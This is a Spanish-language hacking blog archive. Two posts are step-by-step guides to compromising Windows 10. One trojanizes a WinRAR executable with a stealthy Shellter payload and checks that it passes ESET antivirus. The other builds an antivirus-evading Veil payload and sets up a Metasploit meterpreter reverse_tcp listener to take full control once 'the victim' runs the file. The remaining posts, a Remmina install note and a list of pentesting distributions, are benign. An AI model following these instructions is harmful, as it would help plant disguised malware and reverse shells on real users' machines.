Hacking Ético, Seguridad Informática, RedTeam, Pentesting.

Mostrando entradas con la etiqueta distribuciones. Mostrar todas las entradas
Mostrando entradas con la etiqueta distribuciones. Mostrar todas las entradas

jueves, 31 de marzo de 2016

VULNERAR WINDOWS 10 CON SHELLTER

VULNERAR  WINDOWS 10 CON SHELLTER 



En esta ocasión te enseñare como vulnerar windows 10 con shellter y metasploit dos fantásticas y poderosas herramientas para pruebas de penetración.


Nota: Tenemos que tener un .exe dentro de la carpeta de shellter a modo de ejemplo tome winrar

Lo primero que tenemos que hacer es abrir SHELLTER  de la siguiente forma clik derecho en el .exe y luego abrir con wine.


Luego de ello escogemos las opción "A"


Nota: colocar bien el nombre del ejecutable el (.exe) así no generar ningún error.

Nos pedirá que coloquemos el nombre del ejecutable y lo aremos de la siguiente manera en mi caso use winrar, esperamos que termine el proceso.


 Nos quedara así 

luego escogemos la opción "Y" luego la opción "L" y escogemos el payload de la siguiente forma 
Y: habilitar el modo de sigilo (enable stealth mode )
L:  use a listed payload or custom


Luego colocamos nuestra IP y el PUERTO al cual se va a conectar el payload


Esparamos que termine el proceso quedara así 


luego corremos METASPLOIT y lo configuramos de la siguiente forma (colocamos la misma ip y el mismo puerto configurado en shellter )


Se escaneo el archivo con eset 9 y se ejecuto 


Obtendremos acceso al sistema 




viernes, 15 de enero de 2016

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT KALI LINUX 2.0

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT


En la actualidad los sistemas operativos se han actualizado y han tendido demasiado auge entre los usuarios, Windows ha actualizado su sistema operativo y con ello los millones de usuarios que ya lo están usando, ha tenido pros y contras.

Sabiendo que no todos los sistemas son seguros, Windows no es la excepción, bueno como lo dice el título acá te enseñare cómo hacerlo paso a paso, así que comencemos.

Lo primero que tenemos que haces es irnos a la terminal y colocar lo siguiente tenemos que tener instalado Veil-Evasion buscamos la ruta donde lo tenemos instaldo en mi caso seria cd /usr/share/veil-evasion luego lo ejecutamos con este código  ./Veil-Evasion.py


nos llevara a esta pantalla 


luego con el comando use escogemos el payload a usar nos arrojara un listado de payloads disponibles en  este caso escogeré el 5 c/meterpreter/rev_tcp  


nos queda de esta forma 


configuramos nuestro LHOST Y LPORT seria de la siguiente forma  set LHOST  y tu ip y set LPORT y el puerto que quedara en escucha


luego con el comando generate  crearemos el payload nos pedirá que le coloquemos un nombre al payload en mi caso le colocare aplicación esperamos u momento y nos dará la ruta donde se encuentra  seria /var/lib/veil-evasion/output/compiled  y allí estará el .exe


quedara así 


luego ejecutamos metasploit configuraremos los siguiente
use multi/handler
usaremos este payload
set payload Windows/meterpreter/reverse_tcp
configuramos la ip y el Puerto de la siguiente forma
set Lhost y la ip que pusimos anteriormente
set Lport y el puerto que pusimos anteriormente
y de ultimo exploit
nos quedara todo de la siguiente forma


al momento que la victima ejecute el archivo, tendremos una sesión de meterpreter abierta 


obtendremos acceso total a la maquina





espero que te sea útil y te allá gustado. 



"EL MEJOR SISTEMA OPERATIVO EL CEREBRO " 




jueves, 31 de diciembre de 2015

Instalar Remmina en Kli Linux 2.0

Remmina 


¿Que es?
Es un gran programa de escritorio remoto de cliente, para Linux.



Soporta los Siguientes Protocolos:
  • RDP
  • VNC 
  • SSH
  • NX
  • XDMCP
Con este software no nos limitamos a conectarnos a otros sistemas operativos. que sean compatibles con  el estándar del protocolo.

¿Como instalarlo?




"REMMINA"



  

miércoles, 9 de diciembre de 2015

DISTRIBUCIONES PARA HACKING ÉTICO Y AUDITORIAS DE SEGURIDAD

 DISTRIBUCIONES PARA HACKING ÉTICO Y AUDITORIAS DE SEGURIDAD INFORMÁTICA


Existen muchas distribuciones gratuitas y con herramientas de código abierto, desarrolladas para llevar para prácticas de hacking ético y auditorias de seguridad de sistemas y redes.
Te mostraremos 3 distribuciones conocidas para que las utilices y te hagas un profesional de la seguridad informática.

Kali Linux


Kali Linux es una distribución basada en Debian GNU/Linux diseñada principalmente para la auditoría y Seguridad Informática en general. 
Kali Linux trae preinstalados más de 600 programas incluyendo Nmap (un escáner de puertos), Wireshark (un sniffer),John the Ripper(un crackeador de passwords) y la suite Aircrack-ng (software para pruebas de seguridad en redes inalámbricas). Kali puede ser usado desde un Live CD, live-usb y también puede ser instalada como sistema operativo principal.
puedes descargarlo desde aquí


BackBox


BackBox es una distribución de prueba de penetración de evaluación y la seguridad orientada proporcionando un análisis de los sistemas informáticos de la red y kit de herramientas. Entorno de escritorio backbox incluye un completo conjunto de herramientas necesarias para el hacking ético y pruebas de seguridad.

El objetivo principal de la backbox es proporcionando una alternativa, sistema altamente personalizable y buen rendimiento.

Incluye las herramientas de Linux más utilizados, con el objetivo de una amplia difusión de los objetivos, que van desde el análisis de aplicaciones web a la red de análisis, también incluye la evaluación de vulnerabilidades, análisis forense informático y explotación.


Puedes descargarlo desde aquí

Parrot Security os



Parrot Security os distribución basada en Debian. Fue construido con el fin de realizar pruebas de penetración (seguridad informática), la vulnerabilidad de Evaluación y Mitigación, Informática Forense y AnonymousSurfing. Ha sido desarrollado por el equipo de Frozenbox.

ParrotSec se piensa para dar un ambiente ligero, altamente compatible y completa. Ofrece muchos contenidos sobre web y análisis de sistemas de computación, un laboratorio dirigido hacia uso digital forense, con herramientas legalmente reconocidas y la oportunidad de trabajar con la criptografía, que ofrece un amplio conjunto de posibilidades. Además, te permite navegar y trabajar de forma anónima.

Puedes descargarla desde aquí
"EL CONOCIMIENTO ES LIBRE"